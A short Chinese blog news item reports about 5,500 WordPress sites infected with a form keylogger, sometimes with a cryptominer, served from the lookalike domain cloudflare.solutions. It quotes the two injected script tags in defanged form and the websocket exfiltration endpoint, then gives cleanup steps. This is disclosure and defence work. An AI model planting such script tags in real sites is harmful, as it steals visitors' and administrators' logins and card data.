-
据最新消息,约有5500 个 WordPress 网站被发现感染了一个记录键盘点击的恶意脚本,有时候还会加载运行在浏览器上的挖矿程序。
此恶意脚本加载自域名 “cloudflare.solutions”,但该域名与云计算服务商 Cloudflare 无关,只要用户从输入字段切换,就会记录用户在表单字段中输入的内容。
该脚本同时加载到网站的前端和后端,这就意味着它能用于窃取管理员登录凭证和 WP 电子商务网站的信用卡数据。
根据网站源代码搜索引擎 PublicWWW,有 5496 个 WordPress 网站运行了该按键记录程序,而且攻击者从四月份就开始了。
已知加载键盘记录的两个恶意脚本:
< script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js' >< /script >
< script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js' >< /script >
被盗数据被发送到 wss://cloudflare[.]solutions:8085端口。
如恶意代码驻留在function.php文件中,你应该删除add_js_scripts函数和所有提到add_js_scripts的add_action语句。考虑到这个恶意软件的键盘记录功能,你应该考虑所有的WordPress密码都被破坏了,所以下一个步骤是修改密码,此外别忘了检查你的网站是否有其他感染。
顶: 7 踩: 0来源:卢松松博客 QQ/微信:13340454
5500 个 WordPress 网站发现按键记录器
|
相关文章阅读更多:站长 网站 网站安全
- 2022-12-29 日百万流量网站励志一生被K
- 2022-12-24 糗事百科网站和APP关站
- 2022-11-28 天涯论坛停止发帖
- 2022-11-18 中国有权重网站数据现状
- 2022-11-15 为什么国内企业不喜欢用WordPress建站
- 2022-11-11 企业如何直接在商标局官网注册商标
- 2022-11-04 网站地图是什么?该如何生成
- 2022-11-02 如何用JavaScript实现网站不关站备案
- 2022-10-25 cnBeta因个人备案被取消
- 2022-10-24 网站建设热潮来了B2B工业市场人准备好了吗
- 2022-10-18 分享15个自动写稿神器和文案素材网站
- 2022-10-13 教你如何增加网站流量和文章阅读数
- 2022-10-09 某网站SEO无外链仅半年日均IP近10万
- 2022-10-04 专做网站建设怎么样?我非常不建议
- 2021-09-08凡是在卢松松博客投稿的作者都有机会得到IT类图书哦!
发表感想加入微信群